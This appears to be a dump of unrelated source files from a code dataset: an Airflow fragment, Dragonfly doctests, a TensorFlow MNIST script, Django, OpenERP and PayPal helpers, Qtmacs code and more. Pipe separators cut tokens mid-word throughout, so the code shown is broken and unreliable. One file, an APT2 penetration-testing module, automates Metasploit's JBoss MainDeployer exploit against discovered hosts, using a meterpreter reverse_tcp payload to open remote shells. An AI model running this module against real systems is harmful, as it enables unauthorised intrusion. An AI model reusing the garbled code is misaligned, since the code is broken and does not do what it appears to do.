if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
self.client.cancel(list(self.futures.keys()))
for future in as_completed(self.futures.copy()):
self._process_future(future)
def terminate(self):
if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
self.client.cancel(self.futures.keys())
self.end()
|
Versatilus/dragonfly | dragonfly/examples/test_multiple_dictation.py | Python | lgpl-3.0 | 7,289 | 0.003841 | """
Multiple dictation constructs
===============================================================================
This file is a showcase investigating the use and functionality of multiple
dictation elements within Dragonfly speech recognition grammars.
The first part of this file (i.e. the module's doc string) contains a
description of the functionality being investigated along with test code
and actual output in doctest format. This allows the reader to see what
really would happen, without needing to load the file into a speech
recognition engine and put effort into speaking all the showcased
commands.
The test code below makes use of Dragonfly's built-in element testing tool.
When run, it will connect to the speech recognition engine, load the element
being tested, mimic recognitions, and process the recognized value.
Multiple consecutive dictation elements
-------------------------------------------------------------------------------
>>> tester = ElementTester(RuleRef(ConsecutiveDictationRule()))
>>> print(tester.recognize("consecutive Alice Bob Charlie"))
Recognition: "consecutive Alice Bob Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- consecutive (1)
- Alice (1000000)
- Bob (1000000)
- Charlie (1000000)
Extras:
- dictation1: Alice
- dictation2: Bob
- dictation3: Charlie
>>> print(tester.recognize("consecutive Alice Bob"))
RecognitionFailure
|
Mixed literal and dictation elements
-------------------------------------------------------------------------------
Here we will investigate mixed, i.e. interspersed, fixed literal command
words and dynamic dictation elements. We will use the "MixedDictationRule"
class which has a spec | of
"mixed [<dictation1>] <dictation2> command <dictation3>".
Note that "<dictation1>" was made optional instead of "<dictation2>"
because otherwise the first dictation elements would always gobble up
all dictated words. There would (by definition) be no way to distinguish
which words correspond with which dictation elements. Such consecutive
dictation elements should for that reason be avoided in real command
grammars. The way the spec is defined now, adds some interesting
dynamics, because of the order in which they dictation elements parse
the recognized words. However, do note that that order is well defined
but arbitrarily chosen.
>>> tester = ElementTester(RuleRef(MixedDictationRule()))
>>> print(tester.recognize("mixed Alice Bob command Charlie"))
Recognition: "mixed Alice Bob command Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- mixed (1)
- Alice (1000000)
- Bob (1000000)
- command (1)
- Charlie (1000000)
Extras:
- dictation1: Alice
- dictation2: Bob
- dictation3: Charlie
>>> print(tester.recognize("mixed Alice command Charlie"))
Recognition: "mixed Alice command Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- mixed (1)
- Alice (1000000)
- command (1)
- Charlie (1000000)
Extras:
- dictation2: Alice
- dictation3: Charlie
>>> print(tester.recognize("mixed Alice Bob command"))
RecognitionFailure
>>> print(tester.recognize("mixed command Charlie"))
RecognitionFailure
Repetition of dictation elements
-------------------------------------------------------------------------------
Now let's take a look at repetition of dictation elements. For this
we will use the "RepeatedDictationRule" class, which defines its spec
as a repetition of "command <dictation>". I.e. "command Alice" will
match, and "command Alice command Bob" will also match.
Note that this rule is inherently ambiguous, given the lack of a
clear definition of grouping or precedence rules for fixed literal
words in commands, and dynamic dictation elements. As an example,
"command Alice command Bob" could either match 2 repetitions with
"Alice" and "Bob" as dictation values, or a single repetition with
"Alice command Bob" as its only dictation value. The tests below
the show which of these actually occurs.
>>> tester = ElementTester(RuleRef(RepeatedDictationRule()))
>>> print(tester.recognize("command Alice"))
Recognition: "command Alice"
Word and rule pairs: ("1000000" is "dgndictation")
- command (1)
- Alice (1000000)
Extras:
- repetition: [[u'command', NatlinkDictationContainer(Alice)]]
>>> print(tester.recognize("command Alice command Bob"))
Recognition: "command Alice command Bob"
Word and rule pairs: ("1000000" is "dgndictation")
- command (1)
- Alice (1000000)
- command (1000000)
- Bob (1000000)
Extras:
- repetition: [[u'command', NatlinkDictationContainer(Alice, command, Bob)]]
"""
#---------------------------------------------------------------------------
import doctest
from dragonfly import *
from dragonfly.test.infrastructure import RecognitionFailure
from dragonfly.test.element_testcase import ElementTestCase
from dragonfly.test.element_tester import ElementTester
#---------------------------------------------------------------------------
class RecognitionAnalysisRule(CompoundRule):
"""
Base class that implements reporting in human-readable format
details about the recognized phrase. It is used by the actual
testing rules below, and allows the doctests above to be easily
readable and informative.
"""
def _process_recognition(self, node, extras):
Paste(text).execute()
def value(self, node):
return self.get_recognition_info(node)
def get_recognition_info(self, node):
output = []
output.append('Recognition: "{0}"'.format(" ".join(node.words())))
output.append('Word and rule pairs: ("1000000" is "dgndictation")')
for word, rule in node.full_results():
output.append(" - {0} ({1})".format(word, rule))
output.append("Extras:")
for key in sorted(extra.name for extra in self.extras):
extra_node = node.get_child_by_name(key)
if extra_node:
output.append(" - {0}: {1}".format(key, extra_node.value()))
return "\n".join(output)
#---------------------------------------------------------------------------
class ConsecutiveDictationRule(RecognitionAnalysisRule):
spec = "consecutive <dictation1> <dictation2> <dictation3>"
extras = [Dictation("dictation1"),
Dictation("dictation2"),
Dictation("dictation3")]
#---------------------------------------------------------------------------
class MixedDictationRule(RecognitionAnalysisRule):
spec = "mixed [<dictation1>] <dictation2> command <dictation3>"
extras = [Dictation("dictation1"),
Dictation("dictation2"),
Dictation("dictation3")]
#---------------------------------------------------------------------------
class RepeatedDictationRule(RecognitionAnalysisRule):
spec = "<repetition>"
extras = [Repetition(name="repetition",
child=Sequence([Literal("command"),
Dictation()]))]
#---------------------------------------------------------------------------
def main():
engine = get_engine()
engine.connect()
try:
doctest.testmod(verbose=True)
finally:
engine.disconnect()
if __name__ == "__main__":
main()
|
StephanH84/reinforcement_learning_explorations | tensorflow/src/MNIST1.py | Python | mit | 912 | 0.009868 | from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
W = tf.Variable(tf | .zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.matmul(x,W) + b
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entr | opy)
for _ in range(1000):
batch = mnist.train.next_batch(100)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels})) |
cloudrain21/hamsterdb | python/setup.py | Python | apache-2.0 | 505 | 0.007921 |
from distutils.core import setup, Extension
module1=Extension('hamsterdb',
libraries=['hamsterdb'],
include_dirs=['../include'],
li | brary_dirs=['../src/.libs'],
s | ources=['src/python.cc'])
setup(name='hamsterdb-python',
version='2.1.8',
author='Christoph Rupp',
author_email='chris@crupp.de',
url='http://hamsterdb.com',
description='This is the hamsterdb wrapper for Python',
license='Apache Public License 2',
ext_modules=[module1])
|
CopyChat/Plotting | Python/download_era-interim.py | Python | gpl-3.0 | 1,297 | 0.048574 | #!/usr/bin/python
import os
from ecmwfapi import ECMWFDataServer
server = ECMWFDataServer()
time=["06"]
year=["2013"]
param=["129.128","130.128","131.128","132.128","157.128","151.128"]
nam=["hgt","air","uwnd","vwnd","rhum","psl"]
#month=["01","02","03","04","05","06","07","08","09","10","11","12"]
for y in year:
#for m in month:
for p in range(len(param)):
for t in time:
date=y+"-01-01/to/"+y+"-12-31"
print date
print nam[p]+"."+y+"."+t+".nc"
os.system('echo "############################################################# ^_^"')
server.retrieve({
'dataset' : "interim",
'levelist' : "1/2/3/5/7/10/20/30/50/70/100/125/150/175/200/225/250/300/350/400/450/500/550/600/650/700/750/775/800/825/850/875/900/925/950/975/1000",
'step' : "0",
'number' : "all",
'levtype' : "pl", # set to "sl" for surface level
'date' : date,
'time' : t ,
'origin' : "all",
'type' | : | "an",
'param' : "129.128/130.128/131.128/132.128/157.128",
'param' : param[p],
'area' : "0/0/-40/100", # Four values as North/West/South/East
'grid' : "1.5/1.5", # Two values: West-East/North-South increments
'format' : "netcdf", # if grib, just comment this line
'target' : nam[p]+"."+y+"."+t+".nc"
})
|
TonyEight/tundle | tundle/urls.py | Python | mit | 428 | 0.004673 | # coding=utf-8
# This will force all string to be unicode strings, even if we don't
# set the 'u'
from __future_ | _ import unicode_literals
# Django modules imports
from django.conf.urls import patterns, include, | url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Frontend URLs
url(r'^', include('frontend.urls')),
# Admin URLs
url(r'^admin/', include(admin.site.urls)),
)
|
CLVsol/oehealth | oehealth_insured_group/oehealth_insured_group_member.py | Python | agpl-3.0 | 2,443 | 0.010643 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# | #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from osv import osv
from osv import fie | lds
class oehealth_insured_group_member(osv.Model):
_name = 'oehealth.insured.group.member'
_columns = {
'insured_group_id': fields.many2one('oehealth.insured.group', string='Insured Group',
help='Insured Group Titular'),
'insured_id': fields.many2one('oehealth.insured', string='Insured',
help='Insured Group Member Name'),
'role': fields.many2one('oehealth.insured.group.member.role', 'Role', required=True),
'kinship': fields.many2one('oehealth.insured.group.member.kinship', 'Kinship', required=False),
'info': fields.text(string='Info'),
'tag_ids': fields.many2many('oehealth.tag',
'oehealth_insured_group_member_tag_rel',
'insured_group_member_id',
'tag_id',
'Tags'),
}
oehealth_insured_group_member()
|
zsuzhengdu/camp | paypal/standard/helpers.py | Python | mit | 2,448 | 0.007761 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf import settings
def duplicate_txn_id(ipn_obj):
"""Returns True if a record with this transaction id exists and it is not
a payment which has gone from pending to completed.
"""
query = ipn_obj._default_manager.filter(txn_id = ipn_obj.txn_id)
if ipn_obj.payment_status == "Completed":
# A payment that was pending and is now completed will have the same
# IPN transaction id, so don't flag them as duplicates because it
# means that the payment was finally successful!
query = query.exclude(payment_status = "Pending")
return query.count() > 0
def make_secret(form_instance, secret_fields=None):
"""
Returns a secret for use in a EWP form or an IPN verification based on a
selection of variables in params. Should only be used with SSL.
"""
# @@@ Moved here as temporary fix to avoid dependancy on auth.models.
from django.contrib.auth.models import get_hexdigest
# @@@ amount is mc_gross on the IPN - where should mapping logic go?
# @@@ amount / mc_gross is not nessecarily returned as it was sent - how to use it? 10.00 vs. 10.0
# @@@ the secret should be based on the invoice or custom fields as well - otherwise its always the same.
# | Build the secret with fields availible in both PaymentForm and the IPN. Orde | r matters.
if secret_fields is None:
secret_fields = ['business', 'item_name']
data = ""
for name in secret_fields:
if hasattr(form_instance, 'cleaned_data'):
if name in form_instance.cleaned_data:
data += unicode(form_instance.cleaned_data[name])
else:
# Initial data passed into the constructor overrides defaults.
if name in form_instance.initial:
data += unicode(form_instance.initial[name])
elif name in form_instance.fields and form_instance.fields[name].initial is not None:
data += unicode(form_instance.fields[name].initial)
secret = get_hexdigest('sha1', settings.SECRET_KEY, data)
return secret
def check_secret(form_instance, secret):
"""
Returns true if received `secret` matches expected secret for form_instance.
Used to verify IPN.
"""
# @@@ add invoice & custom
# secret_fields = ['business', 'item_name']
return make_secret(form_instance) == secret
|
50wu/gpdb | gpMgmt/bin/gpcheckcat_modules/unique_index_violation_check.py | Python | apache-2.0 | 2,547 | 0.002748 | #!/usr/bin/env python3
class UniqueIndexViolationCheck:
unique_indexes_query = """
select table_oid, index_name, table_name, array_agg(attname) as column_names
from pg_attribute, (
select pg_index.indrelid as table_oid, index_class.relname as index_name, table_class.relname as table_name, unnest(pg_index.indkey) as column_index
from pg_index, pg_class index_class, pg_class table_class
where pg_index.indisunique='t'
and index_class.relnamespace = (select oid from pg_namespace where nspname = 'pg_catalog')
and index_class.relkind = 'i'
and index_class.oid = pg_index.indexrelid
and table_class.oid = pg_index.indrelid
) as unique_catalog_index_columns
where attnum = column_index
and attrelid = table_oid
group by table_oid, index_name, table_name;
"""
def __init__(self):
self.violated_segments_query = """
select distinct(gp_segment_id) from (
(select gp_segment_id, %s
from gp_dist_random('%s')
where (%s) is not null
group by gp_segment_id, %s
having count(*) > 1)
union
(select gp_segment_id, %s
from %s
where (%s) is not null
group by gp_segment_id, %s
having count(*) > 1)
) as violations
"""
def runCheck(self, db_connection):
unique_indexes = db_connection.query(self.unique_indexes_query).getresult()
violations = []
for (table_oid, index_name, table_name, column_names) in unique_indexes:
column_names = ",".join(column_names)
sql = self.get_violated_segments_query(table_name, c | olumn_names)
violated_segments = db_connection.query(sql).getresult()
if violated_segments:
violations.append(dict(table_oid=table_oid,
table_name=table_name,
index_name=index_name,
column_names=column_names,
| violated_segments=[row[0] for row in violated_segments]))
return violations
def get_violated_segments_query(self, table_name, column_names):
return self.violated_segments_query % (
column_names, table_name, column_names, column_names, column_names, table_name, column_names, column_names
)
|
Akay7/hospital | appointments/views.py | Python | lgpl-3.0 | 757 | 0.001321 | from django.views import generic
from django.http import JsonResponse
from django.core.urlresolvers import reverse_lazy
from .forms import AppointmentForm
from .models import TimeManager
class AppointmentsFormView(generic.FormView):
| form_class = AppointmentForm
success_url = reverse_lazy('appointments:registration')
template_name = 'appointments/appointments.html'
def form_valid(self, form):
form.save()
return super(AppointmentsFormView, self).form_valid(form)
class GetFreeTimeView(generic.View):
def post(self, request):
doctor_id = request.POST.get("doctor_id")
day = request.POST.get('day')
answer = dict(TimeManager.get_free_time(doctor_id, d | ay))
return JsonResponse(answer) |
simondodson/Curator | media_db.py | Python | gpl-3.0 | 935 | 0.041711 | import os
from sqlalchemy import create_engine, ForeignKey, func
from sqlalchemy import Column, Date, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm im | port relationship, backref, sessionmaker
Base = declarative_base()
class Series( Base ):
__tablename__ = 'series'
item = Column( String )
tag = Column( String, primary_key=True )
title = Column( String )
imdb = Column(String)
episodes = relationship( 'Episode', backref='episodes' )
class Episode( Base ):
__tablename__ = 'episode'
tag = Column( String, primary_key=True )
title = Column( String )
path = Column( String )
s | eries = Column( String, ForeignKey( 'series.tag' ) )
season = Column( Integer )
class Movie( Base ):
__tablename__ = 'movie'
id = Column( Integer, primary_key=True )
title = Column( String )
path = Column( String )
imdb = Column( String ) |
olitheolix/qtmacs | qtmacs/miniapplets/base_query.py | Python | gpl-3.0 | 18,531 | 0.000432 | # Copyright 2012, Oliver Nagy <olitheolix@gmail.com>
#
# This file is part of Qtmacs.
#
# Qtmacs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Qtmacs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Qtmacs. If not, see <http://www.gnu.org/licenses/>.
"""
Template class to provide a mini applet query with auto completion and
history.
The user need only overload two methods to provide a list of possible
completions and to implement the action on the final input choice.
Here is an example that provide two default choices ('Yes', and 'No')
that can be auto completed with <tab>, but takes any other input the
user supplies as well and puts them into the history (ie. they are
available for <tab> completion the next time). Once the user hits
<enter> the status mini applet displays the entry. Put this in your
configuration file, start Qtmacs, press `<alt>+x`, type
`ExampleQuery`, and try it out::
class ExampleQuery(QtmacsMacro):
\"\"\"
Demonstrate default query.
\"\"\"
import qtmacs.miniapplets.base_query as base_query
class Query(base_query.MiniAppletBaseQuery):
\"\"\"
Derive from MiniAppletBaseQuery and overload with
custom functionality.
\"\"\"
def generateCompletions(self, entry):
\"\"\"
Return a list of auto-completion options based on the
current ``entry``.
\"\"\"
return ('Yes', 'No')
def inputCompleted(self, userInput):
\"\"\"
Implement the action once the user hits enter.
\"\"\"
self.qteMain.qteStatus('You chose: {}'.format(userInput))
def __init__(self):
super().__init__()
# This macro works with all applets and widgets.
self.qteSetAppletSignature('*')
self.qteSetWidgetSignature('*')
# List of previous entries. Keep this list alive between macros
# calls by saving it as an instance variable (ie. in ``self``).
# Since the ``Query`` instance will add all user entries to this
# list, a history that spans the entire life time of this macro
# can be created.
self.qteQueryHistory = ['Yes', 'No']
def qteRun(self):
# Instantiate the query object and install it as the mini applet.
query = self.Query(self.qteApplet, self.qteWidget,
'**A Yes/No Query**',
prefix='Your choice: ',
history=self.qteQueryHistory)
self.qteMain.qteAddMiniApplet(query)
# Register the macro with Qtmacs.
qteRegisterMacro(ExampleQuery)
It is safe to use::
from base_query import *
"""
import os
import qtmacs.type_check
from PyQt4 import QtCore, QtGui
from qtmacs.base_macro import QtmacsMacro
from qtmacs.base_applet import QtmacsApplet
from qtmacs.base_macro import QtmacsMacro
# Shorthands
type_check = qtmacs.type_check.type_check
# Global variables used by the macros to query and update the
# history. Macros using the ``MiniAppletBaseQuery`` class must
# point ``qteQueryHistory`` to the history (a python list) they would
# like to use.
qteQueryHistory = None
qteHistIdx = None
class AutocompleteInput(QtmacsMacro):
"""
Display all possible completions in a dedicated applet.
This macro executes when the user hits the <tab> key and creates a
new completions applet (a simple ``QTextEdit``) if none exists
yet, or brings an existing one to the front. In either case, the
applet will display a list of all possible completions, ie. a list
of all candidates that contain the user entered string as a
sub-string.
|Signature|
* *applet*: 'MiniApplet'
* *widget*: ``QTextEdit``
"""
def __init__(self):
super().__init__()
self.qteSetAppletSignature('MiniApplet')
self.qteSetWidgetSignature('QTextEdit')
# ID of the completions buffer. Note that this name is
# implicitly agreed upon between this macro and the QueryInput
# macro. Therefore, ensure to change the name in both
# locations if so desired.
self.completionsAppID = '__Buffer Completions__'
def qteRun(self):
# Fetch the text typed into the mini applet by the user.
userInput = self.qteWidget.toPlainText()
# Call the generateCompletions method from the
# ``MiniAppletBaseQuery`` class (the programmer has to
# overload it).
completions = self.qteApplet.generateCompletions(userInput)
# Keep only those entries which contain the user input as a
# sub-string.
if isinstance(completions, list) or isinstance(completions, tuple):
completions = [_ for _ in completions if userInput in _]
else:
completions = None
# Auto-complete as much as possible by displaying the largest
# common prefix of all possible completions. If no such prefix
# exists, then do nothing as otherwise the entry field would
# be wiped clean.
pre = os.path.commonprefix(completions)
if len(pre) > 0:
self.qteWidget.setPlainText(pre)
tc = self.qteWidget.textCursor()
tc.movePosition(QtGui.QTextCursor.EndOfLine)
self.qteWidget.setTextCursor(tc)
# If something could be completed do not proceed to
# show a list of possible completions but return now.
if len(pre) > len(userInput):
return
# If the completion is not unique then list all options,
# otherwise close the completions applet altogether.
if (completions is not None) and (len(completions) > 1):
# Get a handle to the completions buffer or create a new
# one if none exists yet.
app = self.qteMain.qteGetAppletHandle(self.completionsAppID)
if app is None:
app = self.qteMain.qteNewApplet('RichEditor',
self.completionsAppID)
self.qteMain.qteSplitApplet(app)
# Clear the buffer and list the possible completions.
app.qteText.clear()
for _ in completions:
app.qteText.append(_)
else:
self.qteMain.qteKillApplet(self.completionsAppID)
class QueryInput(QtmacsMacro):
"""
Close the mini applet and process the user input.
This macro executes when the user hits <enter> to finalise the
input. The mini applet is closed and the extracted string passed
to the (overloaded) ``inputCompleted`` method in the
``MiniAppletBaseQuery`` object.
|Signature|
* *applet*: 'MiniApplet'
* *widget*: ``QTextEdit``
"""
def __init__(self):
super().__init__()
self.qteSetAppletSignature('MiniApplet')
self.qteSetWidgetSignature('QTextEdit')
# ID of the completions buffer. Note that this name is
# implicitly agreed upon between this macro and the
# Autocomp | leteInput macro. Therefore, ensure to change the
# name in both locations if so desired.
self.completionsAppID = '__Buffer Completions__'
def qteRun(self):
# Fetch the final user input.
userInput = self.qteWidget.toPlainText()
# If a history list was supplied to ``MiniA | ppletBaseQuery``
# then add the latest entry.
global qteQueryHistory, qteHistIdx
if isinstance(qteQueryHistory, list):
qteQueryHistory.append(userInput)
qteHistIdx = len(qteQueryHistory)
# P |
MooseDojo/apt2 | modules/action/exploit_msf_jboss_maindeployer.py | Python | mit | 4,087 | 0.004894 | import re
from core.actionModule import actionModule
from core.keystore import KeyStore as kb
from core.mymsf import myMsf
from core.utils import Utils
class exploit_msf_jboss_maindeployer(actionModule):
def __init__(self, config, display, lock):
super(exploit_msf_jboss_maindeployer, self).__init__(config, display, lock)
self.triggers = ["newJbossPassword"]
self.requirements = ["msfconsole"]
self.types = ["http"]
self.title = "Attempt to gain shell via Jboss"
self.shortName = "MSFJbossMainDeployer"
self.description = "execute [exploit/multi/http/jboss_maindeployer] on each target"
self.safeLevel = 3
def getTargets(self):
self.targets = kb.get('port/tcp/443', 'port/tcp/8443', 'service/https', 'service/ssl')
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
#users = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username")
#for user in users:
# passwords = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username/" + user + "/password")
# for password in passwords:
# # verify we have not tested this host before
# if not self.seentarget(t+p+user+password):
# # add the new IP to the already seen list
# self.addseentarget(t+p+user+password)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/multi/http/jboss_maindeployer\n")
msf.execute("set RHOST %s\n" % t)
msf.execute("set RPORT %s\n" % p)
msf.execute("set SVHOST %s\n" % self.config['lhost'])
# msf.execute("set httpusername %s\n" % user)
# msf.execute("set httppassword %s\n" % password)
msf.execute("set target 2")
msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
msf.execute("set LPORT 4445")
msf.execute("set fingerprintcheck false\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
parts = re.findall(".*Meterpreter session.*", result)
| for part in parts:
callFire = True
self.addVuln(t, self.shortName, {"port": p, "username": user, "password": password, "output": outfile.replace("/", "%2F")})
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
if callFire:
self.fire("msfSession")
| # clean up after ourselves
result = msf.cleanup()
return
|
AEDA-Solutions/matweb | backend/Controllers/Curriculo.py | Python | mit | 541 | 0.014787 | # coding=utf-8
from Framework.Controller import Controller
from Database.Controllers.Curriculo import Curriculo as BDCurriculo
from Models.Curriculo.RespostaListar import RespostaListar
from Database.Models.Curriculo import Curriculo as ModelCurriculo
class Curriculo(Controller):
def Listar(self,pedido_listar):
return RespostaListar(BDCurriculo().pegarCurriculos("WHERE id_curso = %s LIMIT %s OFFSET %s",(pedido_listar.getId_cur | so(),str(pedido_listar.getQuantidade()) | ,(str(pedido_listar.getQuantidade()*pedido_listar.getPagina())))))
|
caromedellin/starting_git | test.py | Python | mit | 32 | 0 | print("this is a test file") | ≈
| |
bigdig/vnpy | vnpy/api/oes/__init__.py | Python | mit | 109 | 0.018349 | #from .vnctpm | d import MdApi
from .vnoestd import TdApi
from .vnoesmd import MdApi
from .oe | s_constant import * |
dotKom/onlineweb4 | apps/feedback/__init__.py | Python | mit | 62 | 0 | defa | ult_app_config = 'apps.fee | dback.appconfig.FeedbackConfig'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.